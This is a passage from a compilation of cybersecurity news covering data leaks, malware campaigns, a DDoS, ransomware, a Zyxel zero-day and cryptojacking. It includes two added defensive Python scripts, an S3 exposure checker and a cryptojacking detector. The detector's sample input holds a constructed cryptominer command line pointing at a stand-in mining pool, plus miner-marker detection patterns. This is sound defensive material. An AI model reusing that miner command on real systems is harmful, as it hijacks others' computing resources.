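     "Principal": {"AWS": "arn:aws:iam::123456789012:role/lending-app"},
     "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "arn:aws:s3:::example-kyc-docs/*"}]}
FIXED_PAB = {flag: True for flag in PAB_FLAGS}

if __name__ == "__main__":
    print(assess_bucket(LEAKY_ACL, LEAKY_POLICY, LEAKY_PAB))
    print(assess_bucket(FIXED_ACL, FIXED_POLICY, FIXED_PAB))
```

A bucket passes only when all three inputs are clean. Block Public Access is checked separately because it is the control that would have made the ACL and policy mistakes harmless in the first place: with all four flags on, a public grant is refused at write time rather than discovered by a researcher weeks later.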

The exposed data reportedly includes Know Your Customer (KYC) documents, which financial institutions use to verify identity, address, and income details. This type of information is particularly valuable to cybercriminals, as it can be exploited to fraudulently obtain loans, orchestrate identity theft, or carry out sophisticated social engineering attacks. 

According to researchers, attackers could leverage leaked loan agreements or bank details to manipulate victims into making unauthorized payments or providing further account verification. Furthermore, such personal data often ends up being aggregated and sold on the dark web, amplifying risks for affected individuals and making it harder to protect their privacy. 

To minimize the risks associated with such breaches, experts recommend monitoring bank statements and transaction histories for any suspicious activity and immediately reporting irregularities to financial institutions. Users are also advised to set strong, unique passwords for different accounts, especially those containing financial or sensitive information, and to update them immediately if a breach is suspected. Enabling multi-factor authentication (MFA) adds an extra layer of security and can significantly reduce the likelihood of unauthorized access. 

Another major concern following such incidents is the increased likelihood of social engineering attacks like phishing, where criminals use leaked data to craft convincing fraudulent messages. Attackers may impersonate banks, service providers, or even personal contacts to trick victims into revealing sensitive details, clicking malicious links, or scanning fraudulent QR codes. 

Users should remain cautious of unexpected emails or messages, verify the sender’s identity before clicking any links, and contact companies directly through their official websites. It is crucial to remember that banks and legitimate financial institutions will never request sensitive account details via phone or email or ask customers to transfer funds to another account.

Beware of Fake Viral Video Links Spreading Malware

McAfee Labs has uncovered a rise in cyber scams where fraudsters use fake viral video links to trick people into downloading malware. These attacks rely on social engineering, enticing users with promises of exclusive or leaked content. 

Once a user clicks on the deceptive link, they are redirected through several malicious websites before unknowingly downloading a harmful file. The scheme typically begins with a fake message or document containing a link to a trending video. Clicking the link leads to an unsafe website filled with misleading advertisements, fake download buttons, and sometimes adult content. 

These sites trick users into downloading a file—often a ZIP folder—that seems harmless but actually contains malware hidden within a password-protected archive. Once downloaded and extracted, the file reveals a setup program that, when executed, launches the malware. To make it appear legitimate, a CAPTCHA screen is displayed first. 

However, once the user clicks “OK,” the malware installs itself discreetly, injecting harmful files into the system and running hidden processes that steal data or compromise the device. While McAfee’s security measures have intercepted many such attacks, experts warn that these scams continue to evolve. 

Cybercriminals use clickbait tactics to manipulate people’s curiosity, making it crucial to stay vigilant. To protect yourself, avoid clicking on links that claim to provide exclusive or leaked videos, as these are often traps designed to distribute malware. 

Be cautious of unfamiliar websites that prompt you to download files, as they may contain hidden threats. Always scan downloaded files with reliable security software before opening them. Additionally, keep your antivirus software updated to ensure real-time protection against emerging cyber threats. Since online scams are constantly evolving, staying informed and cautious is the best defense against potential cyber risks.

Chinese Hackers Exploit SSH Daemon to Maintain Persistent Access in Cyber-Espionage Operations

A sophisticated cyber-espionage campaign attributed to the Chinese hacking group Evasive Panda, also known as DaggerFly, has been uncovered, targeting network appliances through a newly identified attack suite. According to cybersecurity researchers at Fortinet’s FortiGuard Labs, the attackers are leveraging a malicious toolkit named ELF/Sshdinjector.A!tr, injecting malware into the SSH daemon (SSHD) to establish long-term access and execute covert operations. 

Active since at least mid-November 2024, this attack method enables unauthorized control over compromised systems. While the initial entry point remains unclear, once infiltrated, a dropper module determines whether the device is already infected and assesses its privilege level. If running under root permissions, the malware deploys multiple binaries, including libssdh.so, which serves as the primary backdoor responsible for command-and-control (C2) communication and data exfiltration. 

Additional components such as “mainpasteheader” and “selfrecoverheader” are used to maintain persistence. The injected SSH library covertly monitors and executes commands received from a remote C2 server, allowing the attackers to conduct system reconnaissance, steal credentials, manipulate files, and execute arbitrary commands. 

The malware supports fifteen different functions, ranging from collecting system details and listing active processes to reading sensitive user data and gaining remote shell access. It can also upload and download files, delete specific records, rename files, and notify the attacker when the malware is active. 

Despite previous detections of similar threats, FortiGuard’s research is the first to provide a detailed analysis of how ELF/Sshdinjector.A!tr operates. The group behind this attack, Evasive Panda, has been active since 2012 and has previously conducted cyber-espionage campaigns, including supply chain attacks via ISPs in Asia and targeted intelligence collection from U.S. organizations. 

The group was also recently linked to deploying a novel macOS backdoor. Notably, Fortinet researchers leveraged AI-assisted tools to aid in the malware’s reverse engineering process. While challenges such as hallucinations, extrapolation errors, and omissions were encountered, the experiment demonstrated AI’s growing potential in cybersecurity research. 

Fortinet assures that its customers are already protected against this threat through its FortiGuard AntiVirus service, which detects the malware as ELF/Sshdinjector.A!tr and Linux/Agent.ACQ!tr. The company has also provided hashes of identified samples on VirusTotal for further investigation by the security community.

Kaveri 2.0 Portal Hit by Massive DDoS Attack

Property registrations and citizen services in Karnataka have been severely affected since Monday due to a large-scale cyberattack on the Kaveri 2.0 portal. The disruptions were initially suspected to be a technical glitch, but the Revenue and E-Governance Departments have now confirmed that they are the result of a “motivated Distributed Denial of Service (DDoS) attack.” 

The Kaveri 2.0 portal, introduced in 2023 to streamline property registration and related services, has been facing issues since January 13, 2025, with attackers consistently exploiting vulnerabilities despite repeated fixes. Revenue Minister Krishna Byre Gowda stated that the evolving nature of these disruptions indicates a deliberate and sustained attempt to cripple the system. 

Officials revealed that bots are being used to conduct excessive searches for encumbrance certificates (ECs) through customer logins, overloading the system and causing it to crash. Even as authorities address certain weaknesses, attackers appear to be adapting in real-time to exploit new loopholes. 

For instance, on Monday, the system was restored by 1 p.m. after a complete outage, but it was down again by 3 p.m. The attack has had a severe impact on property registrations across the state, with daily registrations plummeting from an average of over 8,000 to just over 500 on Tuesday. 

Thousands of property transactions have been postponed indefinitely due to the disruption, leaving buyers and sellers in a state of uncertainty. Many users have been unable to log into the portal or upload necessary documents, causing widespread frustration. 

K.V. Govardhan of Arna Estates, who had registrations scheduled in Bagepalli and Banaswadi on Monday, expressed concerns over the lack of clarity on when the system would be fully restored. 

Globe Life Data Breach Affects 850,000 Customers, Investigation Reveals

Insurance provider Globe Life has revealed that a data breach from June 2024 was far more extensive than initially believed. While early reports in October 2024 suggested that around 5,000 customers were impacted, the company’s latest investigation indicates that approximately 850,000 policyholders may have had their personal data compromised. 

The breach was initially detected in a subsidiary, American Income Life Insurance Company. At the time, Globe Life reported a limited impact but acknowledged the possibility of more affected individuals. 

Further findings now confirm that an unidentified cybercriminal gained access to databases maintained by independent agency owners, exposing a wide range of sensitive customer information. Stolen data includes full names, Social Security numbers, phone numbers, email addresses, home addresses, birth dates, health records, and insurance policy details. 

In response, Globe Life took immediate action to secure its systems, restricting external access to the compromised portal. According to its SEC filing, the company was targeted by an extortion attempt but chose not to meet the ransom demands. The insurer maintains that its primary IT infrastructure and data encryption systems remained intact despite the breach. 

As a precaution, Globe Life is offering credit monitoring services to potentially affected customers. However, cybersecurity experts recommend that policyholders take extra steps to protect themselves, including signing up for identity theft protection, keeping a close watch on financial statements, and being alert to phishing attempts. Cybercriminals frequently use stolen data to create deceptive emails and messages aimed at obtaining further personal or financial information. 

Customers are advised to be cautious when receiving unexpected communications via email, text, or social media. Any unsolicited messages containing links or attachments should be avoided. Installing reliable antivirus software on personal devices can also help protect against malware that may be embedded in phishing attempts. 

Despite the scale of the breach, Globe Life has stated that it does not expect any disruptions to its business operations. However, customers should update their passwords and remain vigilant against potential fraud in the coming months.

Ransomware Attack Disrupts New York Blood Center Operations Amid Critical Shortage

The New York Blood Center (NYBC), a major provider of blood products and transfusion services in the U.S., suffered a ransomware attack on Sunday, leading to operational disruptions and the cancellation of some donor appointments. 

The cyberattack comes at a time when the center is already struggling with a significant drop in blood donations, further straining supply levels. 

NYBC, which collects approximately 4,000 units of blood daily and supports over 500 hospitals across multiple states, detected the security breach over the weekend of January 26. After noticing unusual activity within its IT systems, the organization swiftly enlisted cybersecurity experts to investigate. Their findings confirmed that ransomware was responsible for the disruption. 

In response, NYBC took immediate measures to contain the attack, including temporarily shutting down certain systems while working toward a secure restoration. Despite the ongoing challenges, the organization continues to accept blood donations but warned that some appointments may need to be rescheduled. 

The attack comes just days after NYBC issued a blood emergency following a dramatic 30% decline in donations, resulting in 6,500 fewer units collected and severely impacting regional blood supplies. At this time, it remains unclear whether the attackers accessed or stole sensitive donor information. No ransomware group has claimed responsibility yet.

As NYBC works to restore its systems, it is urging donors to continue making appointments to help address the ongoing blood shortage and ensure hospitals receive the critical supplies they need.

Critical Zero-Day Vulnerability in Zyxel Devices Sparks Widespread Exploitation

Cybersecurity researchers at GreyNoise have uncovered widespread exploitation of a critical zero-day vulnerability in Zyxel CPE Series devices, months after it was initially reported to the manufacturer. The flaw, identified as CVE-2024-40891, allows attackers to execute arbitrary commands on affected devices, potentially leading to data breaches, network infiltration, and complete system compromise. GreyNoise has disclosed the issue to raise awareness among organizations and individuals at risk, as mass exploitation attempts have already been observed.

Details of the Vulnerability and Exploitation

The vulnerability, CVE-2024-40891, was first reported to Zyxel by researchers at VulnCheck in August 2024. However, Zyxel has yet to release a public advisory or an official CVE entry for the flaw, leaving users without a patch to mitigate the risk. GreyNoise collaborated with VulnCheck to disclose the issue, following standard security policies. A GreyNoise spokesperson stated, “Due to first-hand, confirmed mass exploitation attempts for this vulnerability, we chose to disclose this to raise awareness among those who may be impacted.”

Security analysts at Censys estimate that approximately 1,500 devices are online and potentially vulnerable, though definitive confirmation of affected versions is still pending. The National Vulnerability Database (NVD) has not yet provided additional details about the issue. To assess the extent of malicious activity, GreyNoise and VulnCheck conducted a joint investigation, revealing that attackers are actively targeting the flaw.

Researchers noted that CVE-2024-40891 shares similarities with another Zyxel vulnerability, CVE-2024-40890, which also involves authentication and command injection exploits. The key difference is that CVE-2024-40891 is exploited via telnet, while CVE-2024-40890 is HTTP-based. This latest vulnerability follows a recent warning from the Cybersecurity and Infrastructure Security Agency (CISA) and German authorities about another security flaw in Zyxel firewalls, CVE-2024-11667, which was exploited to deploy Helldown ransomware in early December.

Mitigation Strategies and Recommendations

With no official patch available, Zyxel users remain vulnerable to exploitation. Security experts urge organizations to implement temporary mitigation strategies to reduce the risk of compromise. Key recommendations include:

  1. Monitor Network Traffic: Closely monitor network traffic for unusual activity, particularly on devices running Zyxel CPE Series firmware.
  2. Restrict Access: Limit access to potentially affected devices by disabling unnecessary services, such as telnet, and implementing strict access controls.
  3. Apply Workarounds: If possible, apply any available workarounds or configuration changes recommended by cybersecurity experts until an official patch is released.
  4. Stay Informed: Keep track of updates from Zyxel and cybersecurity agencies like CISA for the latest information on the vulnerability and mitigation measures.

A VulnCheck spokesperson confirmed that the firm is actively working with Zyxel on the disclosure process and expects to share further insights in the coming week. In the meantime, organizations are advised to remain vigilant and take proactive steps to protect their networks.

The widespread exploitation of CVE-2024-40891 highlights the critical importance of timely vulnerability disclosure and patch management. As attackers continue to target Zyxel devices, organizations must prioritize cybersecurity measures to safeguard their systems and data. While waiting for an official patch, implementing temporary mitigation strategies and staying informed about updates can help reduce the risk of exploitation. This incident serves as a reminder of the ongoing challenges in securing network devices and the need for collaboration between manufacturers, researchers, and users to address vulnerabilities effectively.

Cryptojacking: The Silent Cybersecurity Threat Surging in 2023

Cryptojacking, the unauthorized exploitation of an organization’s computing resources to mine cryptocurrency, has emerged as a significant yet often overlooked cybersecurity threat. Unlike ransomware, which overtly disrupts operations, cryptojacking operates covertly, leading to substantial financial and operational impacts. In 2023, cryptojacking attacks surged by 659%, totaling 1.1 billion incidents, according to SonicWall’s 2024 Cyber Threat Report.

This dramatic increase underscores the growing appeal of cryptojacking among cybercriminals. The financial implications for businesses are severe. Research indicates that for every dollar’s worth of cryptocurrency mined illicitly, companies incur approximately USD 53 in cloud service costs. This disparity highlights the hidden expenses organizations face when their systems are compromised for unauthorized mining activities.

How Cryptojacking Works and Its Impact

Attackers employ various methods to infiltrate systems, including:

  • Drive-by Downloads: Compromised websites automatically download mining scripts onto visitors’ devices.
  • Phishing Emails: Trick users into installing malware that enables cryptojacking.
  • Exploiting Vulnerabilities: Targeting unpatched software to gain unauthorized access.

The rise of containerized environments has also provided new avenues for attackers. For example, cybercriminals can embed mining scripts within public repository images or target exposed Docker APIs to deploy cryptojacking malware.

Beyond financial losses, cryptojacking degrades system performance by overutilizing CPU and GPU resources. This leads to slower operations, reduced productivity, and increased energy consumption. Over time, the strain on hardware can cause overheating and potential equipment failure. Additionally, compromised systems are more vulnerable to further security breaches, as attackers can leverage their access to escalate attacks.

Combating Cryptojacking: Proactive Measures

To defend against cryptojacking, organizations must implement proactive security measures. Key strategies include:

  1. Endpoint Protection Tools: Deploy solutions that monitor for unusual resource usage, such as sudden spikes in CPU or GPU activity, which may indicate cryptojacking.
  2. Network Traffic Analysis: Analyze network traffic for connections to known cryptocurrency mining pools, which are often used by attackers to process mined coins.
  3. Cloud Monitoring Solutions: Utilize cloud-based tools to detect unauthorized mining activities in cloud environments, where cryptojacking is increasingly prevalent.
  4. Regular Testing and Validation: Simulate cryptojacking attacks to identify vulnerabilities and strengthen defenses before actual threats materialize.
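Added example (not from the original article or from SonicWall's report): a small Python triage script that applies the first two strategies above, resource-usage anomalies and connections to mining-pool ports, to constructed process and socket listings. The CPU threshold, the pool port list and the miner command-line markers are assumptions to tune for your own environment.

```python
"""Score processes for cryptojacking indicators (added example, not from
the article). Corroboration matters: a high-CPU process alone is not an
alert, because legitimate workloads (video encoding, builds) look the same."""
import re
from dataclasses import dataclass, field

CPU_THRESHOLD = 80.0                                  # assumption: sustained CPU % worth a look
POOL_PORTS = {3333, 3334, 4444, 5555, 7777, 14444}    # assumption: ports commonly used by Stratum pools
MINER_RE = re.compile(r"stratum\+(tcp|ssl)://|xmrig|minerd|--donate-level|cryptonight", re.I)
ALERT_SCORE = 3                                       # weights below must add up to this to alert

# Constructed sample input in ps(1)-like and netstat(8)-like layout.
PROCS = """PID   USER  %CPU COMMAND
1     root   0.1 /sbin/init
4471  www   97.3 /tmp/.x/kswapd0 -o stratum+tcp://pool.example:3333 -u 4ABC... --donate-level=1
2210  app   12.0 python3 app.py
3102  root  91.5 /usr/bin/ffmpeg -i in.mp4 out.mp4
"""
CONNS = """Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program
tcp 0 0 10.0.0.5:51234 203.0.113.7:3333 ESTABLISHED 4471/kswapd0
tcp 0 0 10.0.0.5:44210 198.51.100.9:443 ESTABLISHED 2210/python3
tcp 0 0 10.0.0.5:60001 192.0.2.44:8080 ESTABLISHED 3102/ffmpeg
"""

PROC_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+([\d.]+)\s+(.*)$")
CONN_RE = re.compile(r"^(tcp|udp)6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)/(\S+)")


@dataclass
class Finding:
    pid: int
    command: str
    reasons: list = field(default_factory=list)
    score: int = 0


def parse_processes(text):
    """Return {pid: {user, cpu, cmd}}; header and malformed lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            pid, user, cpu, cmd = m.groups()
            procs[int(pid)] = {"user": user, "cpu": float(cpu), "cmd": cmd}
    return procs


def parse_connections(text):
    """Return a list of {pid, remote, rport, state} for each socket line."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            _proto, _laddr, _lport, raddr, rport, state, pid, _prog = m.groups()
            conns.append({"pid": int(pid), "remote": raddr, "rport": int(rport), "state": state})
    return conns


def find_cryptojacking(proc_text, conn_text):
    """Combine weak signals per PID and return findings at or above ALERT_SCORE."""
    procs = parse_processes(proc_text)
    findings = {}

    def note(pid, reason, weight):
        f = findings.setdefault(pid, Finding(pid, procs.get(pid, {}).get("cmd", "?")))
        f.reasons.append(reason)
        f.score += weight

    for pid, p in procs.items():
        if p["cpu"] >= CPU_THRESHOLD:
            note(pid, f"cpu {p['cpu']}% >= {CPU_THRESHOLD}%", 1)      # weak on its own
        if MINER_RE.search(p["cmd"]):
            note(pid, "miner marker in command line", 3)             # strong
    for c in parse_connections(conn_text):
        if c["rport"] in POOL_PORTS and c["state"] == "ESTABLISHED":
            note(c["pid"], f"connection to {c['remote']}:{c['rport']} (pool port)", 2)
    return sorted((f for f in findings.values() if f.score >= ALERT_SCORE), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in find_cryptojacking(PROCS, CONNS):
        print(f"pid {f.pid} score {f.score}: {f.command}\n  " + "\n  ".join(f.reasons))
```

On the constructed input only PID 4471 is reported (score 6); the ffmpeg process at 91.5% CPU scores 1 and is correctly left alone.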

Organizations should also prioritize employee training to recognize phishing attempts and other common attack vectors. Regularly updating and patching software can close vulnerabilities that attackers exploit to infiltrate systems. Additionally, implementing robust access controls and monitoring for unusual user activity can help prevent unauthorized access.

The surge in cryptojacking attacks highlights the growing sophistication of cybercriminals and the need for organizations to adopt comprehensive cybersecurity measures. While cryptojacking may not be as visibly disruptive as ransomware, its financial and operational impacts can be equally devastating. By deploying advanced detection tools, analyzing network traffic, and regularly testing defenses, businesses can mitigate the risks posed by cryptojacking and protect their computing resources from unauthorized exploitation. As cyber threats continue to evolve, proactive and adaptive security strategies will be essential to safeguarding organizational assets and maintaining operational efficiency.

Generative AI in Cybersecurity: A Double-Edged Sword

Generative AI (GenAI) is transforming the cybersecurity landscape, with 52% of CISOs prioritizing innovation using emerging technologies. However, a significant disconnect exists, as only 33% of board members view these technologies as a top priority. This gap underscores the challenge of aligning strategic priorities between cybersecurity leaders and company boards.

The Role of AI in Cybersecurity

According to the latest Splunk CISO Report, cyberattacks are becoming more frequent and sophisticated. Yet, 41% of security leaders believe that the requirements for protection are becoming easier to manage, thanks to advancements in AI. Many CISOs are increasingly relying on AI to:

  • Identify risks (39%)
  • Analyze threat intelligence (39%)
  • Detect and prioritize threats (35%)

However, GenAI is a double-edged sword. While it enhances threat detection and protection, attackers are also leveraging AI to boost their efforts. For instance:

  • 32% of attackers use AI to make attacks more effective.
  • 28% use AI to increase the volume of attacks.
  • 23% use AI to develop entirely new types of threats.

This has led to growing concerns among security professionals, with 36% of CISOs citing AI-powered attacks as their biggest worry, followed by cyber extortion (24%) and data breaches (23%).

Challenges and Opportunities in Cybersecurity

One of the major challenges is the gap in budget expectations. Only 29% of CISOs feel they have sufficient funding to secure their organizations, compared to 41% of board members who believe their budgets are adequate. Additionally, 64% of CISOs attribute the cyberattacks their firms experience to a lack of support.

Despite these challenges, there is hope. A vast majority of cybersecurity experts (86%) believe that AI can help attract entry-level talent to address the skills shortage, while 65% say AI enables seasoned professionals to work more productively. Collaboration between security teams and other departments is also improving:

  • 91% of organizations are increasing security training for legal and compliance staff.
  • 90% are enhancing training for security teams.

To strengthen cyber defenses, experts emphasize the importance of foundational practices:

  1. Strong Passwords and MFA: Poor password security is linked to 80% of data breaches. Companies are encouraged to use password managers and enforce robust password policies.
  2. Regular Cybersecurity Training: Educating employees on risk management and security practices, such as using antivirus software and maintaining firewalls, can significantly reduce vulnerabilities.
  3. Third-Party Vendor Assessments: Organizations must evaluate third-party vendors for security risks, as breaches through these channels can expose even the most secure systems.

Generative AI is reshaping the cybersecurity landscape, offering both opportunities and challenges. While it enhances threat detection and operational efficiency, it also empowers attackers to launch more sophisticated and frequent attacks. To navigate this evolving landscape, organizations must align strategic priorities, invest in AI-driven solutions, and reinforce foundational cybersecurity practices. By doing so, they can better protect their systems and data in an increasingly complex threat environment.